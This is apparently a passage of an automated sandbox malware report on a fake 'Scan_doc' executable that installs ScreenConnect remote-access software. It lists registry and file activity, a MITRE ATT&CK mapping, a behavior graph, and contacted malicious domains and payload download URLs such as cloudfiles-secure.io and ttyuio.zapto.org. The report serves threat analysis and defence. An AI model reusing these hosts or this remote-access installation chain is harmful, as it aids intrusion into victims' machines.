                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF848F43642 CreateNamedPipeW,13_2_00007FF848F43642
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeCode function: 0_2_00831806 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00831806
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
                  Source: Yara matchFile source: 10.0.ScreenConnect.WindowsClient.exe.ff0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.2285819740.000000001BC56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.2784738148.0000022707EC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.2784738148.00000227081F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000000.2273256028.0000000000FF2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2284680562.00000000033A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: dfsvc.exe PID: 1196, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7664, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.ClientService.exe PID: 7700, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, type: DROPPED

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts31
                  Windows Management Instrumentation                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		21
                  Disable or Modify Tools                  		OS Credential Dumping1
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts11
                  Native API                  		1
                  DLL Search Order Hijacking                  		1
                  DLL Search Order Hijacking                  		1
                  Obfuscated Files or Information                  		LSASS Memory2
                  File and Directory Discovery                  		Remote Desktop ProtocolData from Removable Media21
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts12
                  Command and Scripting Interpreter                  		2
                  Windows Service                  		2
                  Windows Service                  		1
                  Install Root Certificate                  		Security Account Manager65
                  System Information Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts1
                  Scheduled Task/Job                  		1
                  Scheduled Task/Job                  		13
                  Process Injection                  		1
                  Timestomp                  		NTDS71
                  Security Software Discovery                  		Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchd1
                  Bootkit                  		1
                  Scheduled Task/Job                  		1
                  DLL Side-Loading                  		LSA Secrets2
                  Process Discovery                  		SSHKeylogging3
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Search Order Hijacking                  		Cached Domain Credentials71
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
                  Masquerading                  		DCSync1
                  Application Window Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Modify Registry                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt71
                  Virtualization/Sandbox Evasion                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron13
                  Process Injection                  		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                  Hidden Users                  		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                  Bootkit                  		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1523878 Sample: Scan_doc_09_16_24_1120.exe Startdate: 02/10/2024 Architecture: WINDOWS Score: 66 48 ttyuio.zapto.org 2->48 50 cloudfiles-secure.io 2->50 52 2 other IPs or domains 2->52 58 Suricata IDS alerts for network traffic 2->58 60 Multi AV Scanner detection for submitted file 2->60 62 .NET source code references suspicious native API functions 2->62 64 3 other signatures 2->64 9 ScreenConnect.ClientService.exe 2->9         started        12 Scan_doc_09_16_24_1120.exe 2 2->12         started        14 svchost.exe 8 2->14         started        16 3 other processes 2->16 signatures3 process4 dnsIp5 74 Reads the Security eventlog 9->74 76 Reads the System eventlog 9->76 19 ScreenConnect.WindowsClient.exe 9->19         started        22 ScreenConnect.WindowsClient.exe 9->22         started        24 dfsvc.exe 132 108 12->24         started        28 WerFault.exe 19 16 12->28         started        30 WerFault.exe 2 14->30         started        46 127.0.0.1 unknown unknown 16->46 signatures6 process7 dnsIp8 66 Creates files in the system32 config directory 19->66 68 Contains functionality to hide user accounts 19->68 54 ttyuio.zapto.org 178.215.236.119, 443, 49705, 49709 LVLT-10753US Germany 24->54 38 C:\...\ScreenConnect.WindowsFileManager.exe, PE32 24->38 dropped 40 C:\Users\...\ScreenConnect.WindowsClient.exe, PE32 24->40 dropped 42 ScreenConnect.WindowsBackstageShell.exe, PE32 24->42 dropped 44 13 other files (none is malicious) 24->44 dropped 32 ScreenConnect.WindowsClient.exe 19 9 24->32         started        file9 signatures10 process11 signatures12 56 Contains functionality to hide user accounts 32->56 35 ScreenConnect.ClientService.exe 32->35         started        process13 signatures14 70 Contains functionality to hide user accounts 35->70 72 Enables network access during safeboot for specific services 35->72

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  Scan_doc_09_16_24_1120.exe14%VirustotalBrowse
                  Scan_doc_09_16_24_1120.exe18%ReversingLabs

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Client.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.ClientService.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.ClientService.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Core.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Windows.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsClient.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsFileManager.exe0%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://g.live.com/odclientsettings/ProdV2.C:0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue0%URL Reputationsafe
                  http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/02/trust0%URL Reputationsafe
                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%URL Reputationsafe
                  http://upx.sf.net0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/02/trust/Issue0%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  cloudfiles-secure.io
                  		178.215.236.119
                  		truetrue
                    		unknown
                    fp2e7a.wpc.phicdn.net
                    		192.229.221.95
                    		truefalse
                      		unknown
                      ttyuio.zapto.org
                      		178.215.236.119
                      		truetrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://cloudfiles-secure.io/Bin/ScreenConnect.ClientService.exetrue
                          		unknown
                          https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsClient.exe.configtrue
                            		unknown
                            https://cloudfiles-secure.io/Bin/ScreenConnect.Client.manifesttrue
                              		unknown
                              https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsFileManager.exe.configtrue
                                		unknown
                                https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsBackstageShell.exe.configtrue
                                  		unknown
                                  https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsBackstageShell.exetrue
                                    		unknown
                                    https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsClient.exetrue
                                      		unknown
                                      https://cloudfiles-secure.io/Bin/ScreenConnect.Core.dlltrue
                                        		unknown
                                        https://cloudfiles-secure.io/Bin/ScreenConnect.Windows.dlltrue
                                          		unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          http://schemas.xmlsoap.org/ws/2004/09/policynsvchost.exe, 00000007.00000002.3272112459.0000022265337000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsFileMana8dfsvc.exe, 00000001.00000002.2784738148.00000227082E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://schemas.xmlsoap.org/ws/2004/09/policy1psvchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application5dfsvc.exe, 00000001.00000002.2792984032.0000022721B00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://login.lsvchost.exe, 00000007.00000002.3270802647.0000022264A27000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000006.00000003.2039355807.000001E584D60000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application%%%dfsvc.exe, 00000001.00000002.2795014048.00000227240A9000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2793471358.0000022721B9A000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2284190303.0000000001592000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2285641644.000000001BBDA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationPdfsvc.exe, 00000001.00000002.2791465766.00000227204E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://login.microsoftonline.com/ppsecure/ResolveUser.srfsvchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application#ScreenConnect.WPjdfsvc.exe, 00000001.00000002.2784738148.00000227081F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationestdfsvc.exe, 00000001.00000002.2793865046.0000022721C0A000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2283633645.000000000156C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAsvchost.exe, 00000007.00000002.3271914143.0000022265300000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://cloudfiles-secure.io/Bin/ScreenConnect.Clidfsvc.exe, 00000001.00000002.2784738148.00000227082E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application22DW.YBK&ScreenConnect.WindowsClient.exe, 0000000A.00000002.2283633645.000000000156C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issuesvchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationVScreenConnect.WindowsClient.exe, 0000000A.00000002.2283633645.000000000156C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      http://cloudfiles-secure.iodfsvc.exe, 00000001.00000002.2784738148.00000227082E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270845D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022708353000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022708459000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application#ScreenConnect.W0dfsvc.exe, 00000001.00000002.2784738148.00000227081F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationZScreenConnect.WindowsClient.exe, 0000000A.00000002.2283633645.0000000001589000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdssvchost.exe, 00000007.00000002.3272256168.0000022265378000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationXScreenConnect.WindowsClient.exe, 0000000A.00000002.2284680562.00000000032FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsBackstageShell.exe.config%dfsvc.exe, 00000001.00000002.2793865046.0000022721C1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationldfsvc.exe, 00000001.00000002.2794699617.0000022724041000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationpps_n329dfsvc.exe, 00000001.00000002.2793865046.0000022721C0A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
